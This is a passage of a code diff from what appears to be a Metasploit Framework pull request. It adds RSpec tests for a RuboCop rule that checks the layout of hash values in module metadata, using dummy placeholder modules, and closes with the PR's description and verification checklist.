+          register_options([])
+        end
+      end
+    RUBY
+  end
+
+  it 'handles an implicit hash without additional instructions' do
+    expect_offense(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author' => [
+                'example1',
+                'example2'
+              ],
+            'Notes' => # Note that reliability isn't included here, as technically the exploit can only
+            # only be run once, after which the service crashes.
+            {
+            ^ a hash value should open on the same line as its key
+              'SideEffects' => [ CONFIG_CHANGES ], # This module will change the configuration by
+              # resetting the router to the default factory password.
+              'Stability' => [ CRASH_SERVICE_DOWN ] # This module will crash the target service after it is run.
+            },
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            )
+        end
+      end
+    RUBY
+
+    expect_correction(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author' => [
+                'example1',
+                'example2'
+              ],
+            # Note that reliability isn't included here, as technically the exploit can only
+            # only be run once, after which the service crashes.
+            'Notes' => {
+              'SideEffects' => [ CONFIG_CHANGES ], # This module will change the configuration by
+              # resetting the router to the default factory password.
+              'Stability' => [ CRASH_SERVICE_DOWN ] # This module will crash the target service after it is run.
+            },
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            )
+        end
+      end
+    RUBY
+  end
+
+  it 'still registers offenses if register_options is present' do
+    expect_offense(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(update_info(info,
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author'        =>
+                    [ 'example1', 'example2' ],
+                    ^ a hash value should open on the same line as its key
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            ))
+          register_options([])
+        end
+      end
+    RUBY
+  end
+end


### PR DESCRIPTION
Commits:
- Adds a Rubocop rule to properly align module hash values 
- Runs the layout linting rules on a subsection of modules

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `reload_all`
- [ ] Spot check some modules to verify they're sane